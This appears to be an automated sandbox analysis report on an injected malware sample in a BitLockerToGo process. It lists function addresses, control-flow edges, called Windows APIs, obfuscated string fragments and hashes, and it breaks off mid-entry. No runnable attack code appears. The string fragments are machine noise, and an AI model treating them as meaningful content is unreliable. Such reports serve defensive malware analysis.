                                                                                                                                                                  control_flow_graph 298 2d15eb1-2d15eb4 299 2d16065 298->299 300 2d15f97-2d15fcc 298->300 301 2d15ebb 298->301 302 2d1605e-2d16060 298->302 310 2d161a9-2d161b2 299->310 304 2d15ff6-2d16002 300->304 305 2d15fce-2d15fcf 300->305 301->300 303 2d1624c-2d16271 302->303 308 2d16273 303->308 309 2d162a6-2d162ad 303->309 306 2d16052-2d16057 304->306 307 2d16004-2d1600f 304->307 311 2d15fd0-2d15ff4 call 2d17080 305->311 306->299 306->302 312 2d16010-2d16017 307->312 315 2d16280-2d162a4 call 2d17080 308->315 313 2d162ea-2d162ed 309->313 314 2d162af-2d162bb 309->314 316 2d161b7-2d161dc 310->316 311->304 318 2d16020-2d16026 312->318 319 2d16019-2d1601c 312->319 313->310 313->316 321 2d16511-2d16527 313->321 322 2d164a2-2d164b8 313->322 323 2d162f4-2d162ff 313->323 324 2d16569-2d16583 313->324 325 2d1655b-2d16562 313->325 320 2d162c0-2d162c7 314->320 315->309 327 2d16206-2d1620d 316->327 328 2d161de-2d161df 316->328 318->306 334 2d16028-2d1604a call 2d15ad0 318->334 319->312 330 2d1601e 319->330 331 2d162d0-2d162d6 320->331 332 2d162c9-2d162cc 320->332 335 2d16500-2d16506 321->335 336 2d16529 321->336 340 2d164e9-2d164f4 322->340 341 2d164ba 322->341 338 2d16585 324->338 339 2d165b6-2d165bb 324->339 325->316 325->323 325->324 327->303 333 2d1620f-2d1621b 327->333 343 2d161e0-2d16204 call 2d17080 328->343 330->306 331->313 349 2d162d8-2d162e2 call 2d15ad0 331->349 332->320 348 2d162ce 332->348 345 2d16220-2d16227 333->345 357 2d1604f 334->357 335->321 346 2d16530-2d16557 call 2d17110 336->346 347 2d16590-2d165b4 call 2d17190 338->347 340->321 351 2d164c0-2d164e7 call 2d17110 341->351 343->327 354 2d16230-2d16236 345->354 355 2d16229-2d1622c 345->355 367 2d16559 346->367 347->339 348->313 365 2d162e7 349->365 351->340 354->303 362 2d16238-2d16244 call 2d15ad0 354->362 355->345 361 2d1622e 355->361 357->306 361->303 368 2d16249 362->368 365->313 367->335 368->303
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %sgh$4`[b
                                                                                                                                                                  • API String ID: 0-1596593044
                                                                                                                                                                  • Opcode ID: fc31db515b390fc83225504a4e15333edbdac4d4488b0952fadf307a30e0fdfb
                                                                                                                                                                  • Instruction ID: 72655a907470c2dd79e4ace881de4e75d8ae0a399a51658e8f0af2d16b2e62c5
                                                                                                                                                                  • Opcode Fuzzy Hash: fc31db515b390fc83225504a4e15333edbdac4d4488b0952fadf307a30e0fdfb
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A919C74A0C341ABE315DF18E490A2AFBE5EB9A345F648C1CE4C5877A1D335DC64CBA2
                                                                                                                                                                  Function 02D15AD0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 512 2d15ad0-2d15b02 LdrInitializeThunk
                                                                                                                                                                  APIs
                                                                                                                                                                  • LdrInitializeThunk.NTDLL(02D193AD,005C003F,00000006,?,?,00000018,00070605,?,?), ref: 02D15AFE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                  Function 02CDEA30 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 572libraryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 171 2cdea30-2cdea69 172 2cdea6b 171->172 173 2cdeaaa-2cdeb07 171->173 174 2cdea70-2cdeaa8 call 2ce1020 172->174 175 2cdeb3c-2cdeb57 LoadLibraryExW call 2d13df0 173->175 176 2cdeb09 173->176 174->173 184 2cdeb5e-2cdeb60 175->184 185 2cdeb65-2cdeca0 call 2d18840 * 12 175->185 186 2cdecd1 175->186 187 2cdecc0 175->187 188 2cdede3-2cdedec 175->188 189 2cdecc2-2cdecca 175->189 178 2cdeb10-2cdeb3a call 2ce0fb0 176->178 178->175 195 2cdf364-2cdf36e 184->195 185->187 186->188 187->189 191 2cdefaf-2cdf032 188->191 192 2cdefaa 188->192 193 2cdefa5 188->193 194 2cdedf3-2cdef45 188->194 189->186 189->188 198 2cdf034 191->198 199 2cdf071-2cdf07f 191->199 192->195 197 2cdf35e-2cdf362 193->197 200 2cdef47 194->200 201 2cdef81-2cdef93 call 2cdf950 194->201 197->195 205 2cdf040-2cdf06f call 2ce1110 198->205 206 2cdf081-2cdf085 199->206 207 2cdf0b0-2cdf0b2 199->207 202 2cdef50-2cdef7f call 2ce1090 200->202 210 2cdef98-2cdef9e 201->210 202->201 205->199 213 2cdf097-2cdf09b 206->213 211 2cdf0b6-2cdf0bd 207->211 210->191 210->193 218 2cdf36f-2cdf37a 210->218 219 2cdf32e-2cdf335 210->219 220 2cdf0c4-2cdf0cf 210->220 221 2cdf144-2cdf149 210->221 222 2cdf241-2cdf250 210->222 223 2cdf380 210->223 224 2cdf0e0-2cdf10f 210->224 225 2cdf382-2cdf384 210->225 226 2cdf33c-2cdf341 210->226 227 2cdf1fb-2cdf20b 210->227 228 2cdf2d6-2cdf2e5 210->228 229 2cdf116-2cdf12a 210->229 230 2cdf1f6 210->230 231 2cdf131-2cdf13d 210->231 232 2cdf350 210->232 233 2cdf352-2cdf35b call 2d126b0 210->233 211->218 211->219 211->220 211->221 211->222 211->223 211->224 211->225 211->226 211->227 211->228 211->229 211->230 211->231 211->232 211->233 214 2cdf09d-2cdf0a4 213->214 215 2cdf0b4 213->215 240 2cdf0aa 214->240 241 2cdf0a6-2cdf0a8 214->241 215->211 218->223 219->218 219->221 219->223 219->224 219->225 219->226 219->227 219->229 219->230 219->231 219->232 219->233 220->224 245 2cdf150-2cdf158 221->245 242 2cdf291-2cdf29d 222->242 243 2cdf252 222->243 223->225 224->221 224->224 224->227 224->229 224->230 224->231 224->232 224->233 244 2cdf390-2cdf396 225->244 226->232 238 2cdf20d-2cdf214 227->238 239 2cdf231-2cdf23c 227->239 228->222 235 2cdf2eb 228->235 229->224 229->231 229->232 229->233 230->227 231->221 231->224 231->227 231->229 231->230 231->231 231->232 231->233 233->197 246 2cdf2f0-2cdf31f call 2ce1190 235->246 249 2cdf220-2cdf22f 238->249 239->226 251 2cdf0ac-2cdf0ae 240->251 252 2cdf090-2cdf095 240->252 241->240 254 2cdf29f-2cdf2ac 242->254 255 2cdf2d0 242->255 250 2cdf260-2cdf28f call 2ce1190 243->250 244->244 253 2cdf398-2cdf3b1 244->253 245->245 256 2cdf15a-2cdf178 245->256 272 2cdf321 246->272 249->239 249->249 250->242 251->252 252->211 252->213 253->221 253->224 253->227 253->229 253->230 253->231 253->232 253->233 262 2cdf2b7-2cdf2bb 254->262 255->228 257 2cdf17a-2cdf184 256->257 258 2cdf1c6-2cdf1cd 256->258 263 2cdf190-2cdf193 257->263 265 2cdf1d7-2cdf1ef call 2cdf3c0 258->265 268 2cdf2bd-2cdf2c4 262->268 269 2cdf326 262->269 270 2cdf1cf-2cdf1d2 263->270 271 2cdf195-2cdf1b2 call 2ce0e50 263->271 265->224 265->227 265->230 265->231 265->232 265->233 275 2cdf2ca 268->275 276 2cdf2c6-2cdf2c8 268->276 269->219 270->265 284 2cdf1bc-2cdf1c4 271->284 285 2cdf1b4-2cdf1ba 271->285 272->222 280 2cdf2cc-2cdf2ce 275->280 281 2cdf2b0-2cdf2b5 275->281 276->275 280->281 281->255 281->262 284->265 285->263 285->284
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(9F779963,00000000,93929990), ref: 02CDEB47
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: >
                                                                                                                                                                  • API String ID: 1029625771-325317158
                                                                                                                                                                  • Opcode ID: fa19999e2dfe8ed87f8c1744472e6684bad235fb0052fd1cbed204776e9d3cbd
                                                                                                                                                                  • Instruction ID: b816e9f9635f35d769440150005af58c2158dae58bedf08ba2aea6eaa455731c
                                                                                                                                                                  • Opcode Fuzzy Hash: fa19999e2dfe8ed87f8c1744472e6684bad235fb0052fd1cbed204776e9d3cbd
                                                                                                                                                                  • Instruction Fuzzy Hash: 4312AEB5908381DBE320DF24E950B6FBBE1EB95304F090C2CE5899B742D3358919CBA3
                                                                                                                                                                  Function 02D15520 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 478 2d15520-2d15534 479 2d155c5-2d155cb call 2d126b0 478->479 480 2d155b7 478->480 481 2d15549-2d15566 478->481 482 2d1553b-2d15542 478->482 483 2d155bd 478->483 484 2d155ac-2d155ad call 2d12630 478->484 485 2d155ce-2d155d4 call 2d126b0 478->485 479->485 480->483 489 2d15596-2d155aa RtlReAllocateHeap 481->489 490 2d15568 481->490 482->479 482->480 482->481 482->483 482->485 487 2d155bf-2d155c4 483->487 492 2d155b2-2d155b5 484->492 489->487 494 2d15570-2d15594 call 2d15a50 490->494 492->487 494->489
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 02D155A4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: fe0edea62908a110ffbc02a74e3a9573de2bb16a84bbc8ce7dc98f17e14ec106
                                                                                                                                                                  • Instruction ID: 88d901b891f289fe11f6e42ffbce1f5471347e4b9b506867cc32a3539836bb49
                                                                                                                                                                  • Opcode Fuzzy Hash: fe0edea62908a110ffbc02a74e3a9573de2bb16a84bbc8ce7dc98f17e14ec106
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B118F7190C250ABD3116F18F808A1FBBF5EF96700F454868E8C487751D33ADC29CBA2
                                                                                                                                                                  Function 02D126B0 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 498 2d126b0-2d126bf 499 2d126c6-2d126e0 498->499 500 2d12729-2d1272d 498->500 501 2d126e2 499->501 502 2d12716-2d12723 RtlFreeHeap 499->502 503 2d126f0-2d12714 call 2d159e0 501->503 502->500 503->502
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 02D12723
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: 2bf6c4b9cc20354fd06ef954e7e0f17fc2aad3b24c23af17b1c48f52166fe663
                                                                                                                                                                  • Instruction ID: cd0ca6f9841ac1b226fe0268b5062a821abb0471552f3e60ecb537b4d70f01d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf6c4b9cc20354fd06ef954e7e0f17fc2aad3b24c23af17b1c48f52166fe663
                                                                                                                                                                  • Instruction Fuzzy Hash: ADF03C3050C290ABD311AF18E855B0EBBE5EF56700F468C6CE8C49B351C236DC64DBA3
                                                                                                                                                                  Function 02D12630 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 506 2d12630-2d12659 507 2d12686-2d1269f RtlAllocateHeap 506->507 508 2d1265b 506->508 509 2d12660-2d12684 call 2d15950 508->509 509->507
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 02D12693
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: edea807f50439cf5337afcd8dfe0e0423d8a8e0a07215f96e39dd2d95f18f18f
                                                                                                                                                                  • Instruction ID: ebfb86b0fca8f3806296ffbd3cc6be9f2da3a0e17f064d4b41a30f610e239305
                                                                                                                                                                  • Opcode Fuzzy Hash: edea807f50439cf5337afcd8dfe0e0423d8a8e0a07215f96e39dd2d95f18f18f
                                                                                                                                                                  • Instruction Fuzzy Hash: 29F0377450C280ABC311EF18E558A1EBBF5EFAA700F15881CE4C48B7A1C3369C24CBA3

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 02CF88F0 Relevance: 33.7, Strings: 26, Instructions: 1208COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: M0O$!k#i$#g;e$%S'Q$,W'U$3{7y$4E:G$4`[b$4`[b$4o)m$6I5K$7w9u$=K0I$>c8a$?G2E$A3V1$D'$H+e)$I7G5$P?r=$m/U-$/-$31$75$;9$?=
                                                                                                                                                                  • API String ID: 0-3207955556
                                                                                                                                                                  • Opcode ID: a2b580ac08e082416257b9bea279cc2cda1769e0652e64f88f61014a0870978f
                                                                                                                                                                  • Instruction ID: b2111d4abe1b7f9e41ec539ab130723051b6d737957bf3c988fe437b79ca2a5c
                                                                                                                                                                  • Opcode Fuzzy Hash: a2b580ac08e082416257b9bea279cc2cda1769e0652e64f88f61014a0870978f
                                                                                                                                                                  • Instruction Fuzzy Hash: 92B2A5B4A0071AEFDB54CFA9D8807AAFBB1FF05304F508658E558AB740D731A965CF90
                                                                                                                                                                  Function 02CF8BE0 Relevance: 27.3, Strings: 21, Instructions: 1028COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: M0O$!k#i$#g;e$%S'Q$,W'U$3{7y$4E:G$4`[b$4`[b$4o)m$6I5K$7w9u$=K0I$>c8a$?G2E$A3V1$D'$H+e)$I7G5$P?r=$m/U-
                                                                                                                                                                  • API String ID: 0-2826869237
                                                                                                                                                                  • Opcode ID: d1da7c909d7e0d61e55597d6855325565cef32c52e89dcd7e6d31700a2491e9c
                                                                                                                                                                  • Instruction ID: 415b0671553f25fcf3636b72e93ccf9f3e89dfe5219915582bc6ee7dcadda9a9
                                                                                                                                                                  • Opcode Fuzzy Hash: d1da7c909d7e0d61e55597d6855325565cef32c52e89dcd7e6d31700a2491e9c
                                                                                                                                                                  • Instruction Fuzzy Hash: B0A2B6B4A00B1AEFDB54CFA5C8807AAFBB1FF45304F508648D569ABB50D731A961CF90
                                                                                                                                                                  Function 02CF7FA0 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 458COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4G6A$8;$=ChM$E;YE$L3Y=$LO$M?H9$Ok&i$Q#U-$Y'K!$Y7U1$[/Q)$^+A5$a
                                                                                                                                                                  • API String ID: 0-2780120701
                                                                                                                                                                  • Opcode ID: 7c5d1c021a8f0d3cc66f166a26cbe78d40b550030bed94b24922b64b220626e7
                                                                                                                                                                  • Instruction ID: 8f92582c21b124b423bd2fa3a9a2fb8c27bf7b0123b0c42468d5c6ac7a98ef1a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5d1c021a8f0d3cc66f166a26cbe78d40b550030bed94b24922b64b220626e7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B0251B4508340ABD390DF55E980A1FBBF5EB96B48F404A0CF6C99B251D335DA09CBA7
                                                                                                                                                                  Function 02CEEDAD Relevance: 22.4, Strings: 17, Instructions: 1127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: HINO$L$TWVQ$XY^_$X[ZU$YZ[D$\_^Y$`$`cb}$efg`$hkje$loni$mz$tuz{$twvq$x{zu$Uz:
                                                                                                                                                                  • API String ID: 0-517180400
                                                                                                                                                                  • Opcode ID: b1903a3721a5eb2b0d2e932ddf9028b5b96326746dda2b61e6024911a6f113be
                                                                                                                                                                  • Instruction ID: 1debff6de81554b874fea4698f0d72d6d845d492d442330e15fd39af9972f1c2
                                                                                                                                                                  • Opcode Fuzzy Hash: b1903a3721a5eb2b0d2e932ddf9028b5b96326746dda2b61e6024911a6f113be
                                                                                                                                                                  • Instruction Fuzzy Hash: 5FA256B55083819BEB74CF14C880BAFB7E2EFC5704F14481CE9CA9B690DB75A945CB92
                                                                                                                                                                  Function 02D0E449 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 587memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Alloc$InitVariant
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 3520221836-3962175265
                                                                                                                                                                  • Opcode ID: ac22aff69287e411776988688839ae90e7f2b2ffedc7ae3649575f9741b2bcb5
                                                                                                                                                                  • Instruction ID: c80ccb3fa6f0e00c51aaec014fe0b904c1d7441352eca36ef369c33812571892
                                                                                                                                                                  • Opcode Fuzzy Hash: ac22aff69287e411776988688839ae90e7f2b2ffedc7ae3649575f9741b2bcb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 6422C775A083419FE324DF24D888B6ABBE2FF89305F148D2CE589873A1D735D855CB52
                                                                                                                                                                  Function 02CECFA0 Relevance: 14.9, Strings: 11, Instructions: 1109COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ,$2821$4C%E$4`[b$4`[b$?($DG$P?b1$ng{b$p$u
                                                                                                                                                                  • API String ID: 0-2468594515
                                                                                                                                                                  • Opcode ID: dce1df62a96de539ede6107c9299e018ec8190d1799c3f09c7af84f8896ddfc1
                                                                                                                                                                  • Instruction ID: 07e84dbd53402eba4b7b6db0d7f4d5fe96fa35d6d6495bec6cf05b94701d7958
                                                                                                                                                                  • Opcode Fuzzy Hash: dce1df62a96de539ede6107c9299e018ec8190d1799c3f09c7af84f8896ddfc1
                                                                                                                                                                  • Instruction Fuzzy Hash: 839277B55093809FE7708F14D881BEBBBE6EFC9304F04492CE5CA8B251DB759991CB92
                                                                                                                                                                  Function 02D02994 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 632COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 8M:O$B=_?$H9S;$jXJ-$vA.C$wEtG$Wu
                                                                                                                                                                  • API String ID: 0-3312069854
                                                                                                                                                                  • Opcode ID: 48ad17ebe0d0b4c20741b6ef4244631fe802fba0ebfcf2f7b8d544066fd8cb31
                                                                                                                                                                  • Instruction ID: 0e2b135aa76dcf565992848dfcc862618684d3daa169f130e769c2b6c044ee57
                                                                                                                                                                  • Opcode Fuzzy Hash: 48ad17ebe0d0b4c20741b6ef4244631fe802fba0ebfcf2f7b8d544066fd8cb31
                                                                                                                                                                  • Instruction Fuzzy Hash: 43426A70405B809AD732CF35C494BE3BBE1AF17309F44489DD4EA8B3A2DB39A945DB61
                                                                                                                                                                  Function 02D039C0 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 558COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 8M:O$B=_?$H9S;$jXJ-$vA.C$wEtG$Wu
                                                                                                                                                                  • API String ID: 0-3312069854
                                                                                                                                                                  • Opcode ID: acf84f3abbb1a223aaa97cc516548b4a41299cc3aaf8448e48b432764392612a
                                                                                                                                                                  • Instruction ID: 6304e007cc1515eb3aa0a388be7c1d4bd0acb61f64ff0b5b577153c127897419
                                                                                                                                                                  • Opcode Fuzzy Hash: acf84f3abbb1a223aaa97cc516548b4a41299cc3aaf8448e48b432764392612a
                                                                                                                                                                  • Instruction Fuzzy Hash: 69227A70405B809AD732CF35C498BE3BBE1AF17309F44488CD4EA8B3A2DB39A545DB65
                                                                                                                                                                  Function 02CD1000 Relevance: 13.1, Strings: 9, Instructions: 1817COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -$0$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff$gfff
                                                                                                                                                                  • API String ID: 0-1114095000
                                                                                                                                                                  • Opcode ID: 660d8ac1643a69f5efb93db7fc4f09fbca3e3b063dec5d11f79ec1d792dab456
                                                                                                                                                                  • Instruction ID: 9d67154f791efd73f736b30b391a7945001b43ab2f869815accdc4a89811afc5
                                                                                                                                                                  • Opcode Fuzzy Hash: 660d8ac1643a69f5efb93db7fc4f09fbca3e3b063dec5d11f79ec1d792dab456
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD23D716083918FD718CE29C89036ABBE2AFC5314F08866DE999DB382D775DD05CB93
                                                                                                                                                                  Function 02CDD860 Relevance: 11.5, Strings: 9, Instructions: 285COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *#1/$8';8$?8$#$K_I\$VPNj$XTJR$YWW\$kwm{$zs
                                                                                                                                                                  • API String ID: 0-1544250960
                                                                                                                                                                  • Opcode ID: caa4b1170c7747c33aa2ea78e9f8896740522c7b286e161fac7a5f90c4e60116
                                                                                                                                                                  • Instruction ID: 2ce2dacc11752a4f8af9b2ca617a69f13184b35a113524532bb2149114ca7a0b
                                                                                                                                                                  • Opcode Fuzzy Hash: caa4b1170c7747c33aa2ea78e9f8896740522c7b286e161fac7a5f90c4e60116
                                                                                                                                                                  • Instruction Fuzzy Hash: E6A162B150C3909BD3228F19C490A2BFFE1AF96744F14895CE5DA8B3A2C335D906CB97
                                                                                                                                                                  Function 02CFB9F0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 449COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2cd0000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b$LT$TU$7Wu$YW
                                                                                                                                                                  • API String ID: 0-2131283552
                                                                                                                                                                  • Opcode ID: 8e818ca0d223ae447f2deb6b3f9836376c2f2508e8ffab67bc586ed1fabb8eab
